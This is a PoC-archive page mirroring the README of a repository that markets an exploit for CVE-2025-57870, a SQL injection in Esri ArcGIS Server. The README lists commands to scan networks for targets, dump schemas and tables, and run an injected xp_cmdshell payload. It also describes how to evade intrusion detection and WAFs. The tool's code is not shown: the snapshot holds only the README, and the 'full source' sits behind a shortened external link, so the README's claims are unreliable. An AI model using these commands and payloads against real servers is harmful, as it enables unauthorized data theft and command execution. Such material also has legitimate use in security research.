Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-57870 PoC — BUG-000179884 - There is a security vulnerability in ArcGIS Server Feature Services.

Source
https://github.com/ByteHawkSec/CVE-2025-57870-POC
Associated Vulnerability
Title:BUG-000179884 - There is a security vulnerability in ArcGIS Server Feature Services. (CVE-2025-57870)
Description:A SQL Injection vulnerability exists in Esri ArcGIS Server versions 11.3, 11.4 and 11.5 on Windows, Linux and Kubernetes. This vulnerability allows a remote, unauthenticated attacker to execute arbitrary SQL commands via a specific ArcGIS Feature Service operation. Successful exploitation can potentially result in unauthorized access, modification, or deletion of data from the underlying Enterprise Geodatabase.
Description
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') in Esri ArcGIS Server
Readme
# Esri ArcGIS Server SQL Injection Exploit - CVE-2025-57870

This repository provides a professional-grade exploit for CVE-2025-57870, a critical SQL injection vulnerability in Esri ArcGIS Server versions 11.3, 11.4, and 11.5. The tool targets the Feature Service `/query` endpoint, enabling unauthenticated remote execution of arbitrary SQL commands on the underlying Enterprise Geodatabase. Designed for penetration testers and security researchers, it supports data exfiltration, modification, and potential RCE on certain database backends.  

**Note:** Full source code access - **[href](https://tinyurl.com/3zjbu33f)** . This repository contains core exploit logic and utilities for authorized testing.  

## Features
- Unauthenticated exploitation of ArcGIS Feature Services.
- Supports MSSQL, Oracle, and PostgreSQL backends.
- Modes: Error-based, blind (time-based), and out-of-band (OOB) injection.
- Built-in scanner for identifying vulnerable ArcGIS instances.
- Evasion techniques: Randomized delays, User-Agent rotation, proxy support (TOR/SOCKS).
- Post-exploitation: Schema enumeration, table dumping, and command execution.

## Repository Structure
- `sqli_exploit.py`: Main exploit script with modular injection logic.
- `scanner.py`: Network scanner to detect vulnerable ArcGIS servers.
- `payload_generator.py`: Generates custom SQL payloads for specific actions.
- `evasion_utils.py`: Evasion utilities for bypassing IDS/IPS.
- `db_backends/`: Backend-specific payload handlers (mssql.py, oracle.py, postgres.py).
- `config.yaml`: Configuration file for target, proxy, and logging settings.
- `requirements.txt`: Python dependencies.
- `exploited_data/`: Output directory for dumped data.
- `demo.mp4/`: A video instruction manual
## Prerequisites
- Python 3.8+
- Install dependencies: `pip install -r requirements.txt`

## Setup
1. Configure `config.yaml` with target details:
   ```yaml
   target:
     url: "https://target.com/ArcGIS/rest/services/ServiceName/FeatureServer/0/query"
     db_type: "mssql"  # Options: mssql, oracle, postgres
   proxy:
     enabled: false
     type: "socks5"
     address: "127.0.0.1:9050"
   logging:
     level: "debug"
     output_dir: "exploited_data"
   ```
2. Scan for vulnerable servers:  
   `python scanner.py --network 192.168.1.0/24 --port 6080`

## Usage
Run the exploit:  
`python sqli_exploit.py --target-url <URL> --mode blind --action dump_schema --output exploited_data/schema.json`

### Options
- `--target-url`: Full FeatureServer query URL (required).
- `--mode`: `error`, `blind`, or `oob` (default: error).
- `--action`: `dump_schema`, `dump_table`, `execute_cmd` (required).
- `--db-type`: `mssql`, `oracle`, or `postgres` (required).
- `--table`: Target table for `dump_table` action (optional).
- `--custom-payload`: Raw SQL payload for custom injections (optional).
- `--evade`: Enable evasion techniques (default: off).
- `--output`: Output file for results (default: exploited_data/output.json).

### Examples
1. Dump database schema (MSSQL):  
   `python sqli_exploit.py --target-url https://target.com/ArcGIS/rest/services/Service/FeatureServer/0/query --mode error --action dump_schema --db-type mssql --output schema.json`

2. Dump specific table (Oracle):  
   `python sqli_exploit.py --target-url https://target.com/ArcGIS/rest/services/Service/FeatureServer/0/query --mode blind --action dump_table --db-type oracle --table users --output users.json`

3. Attempt RCE (MSSQL xp_cmdshell):  
   `python sqli_exploit.py --target-url https://target.com/ArcGIS/rest/services/Service/FeatureServer/0/query --mode error --db-type mssql --custom-payload "; EXEC xp_cmdshell 'whoami' --" --output cmd_output.txt`

## Evasion Techniques
- `--evade`: Enables random delays (1-5s), User-Agent rotation, and proxy chaining.
- Proxy support: Configure TOR or SOCKS5 in `config.yaml`.
- Payload obfuscation: Automatic comment injection (e.g., `/**/`) to bypass WAFs.

## Get the exploit
### **[href](https://tinyurl.com/3zjbu33f)**
## Disclaimer
For authorized security testing only. Unauthorized use is illegal. The authors are not responsible for misuse or damages.  

##  Contact
For any questions or inquiries, please contact: bytehawkcorp@outlook.com
File Snapshot

 [4.0K]  /data/pocs/4c7835b3cef7417f950801ee45b1ab29e45a65c2
└── [4.1K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →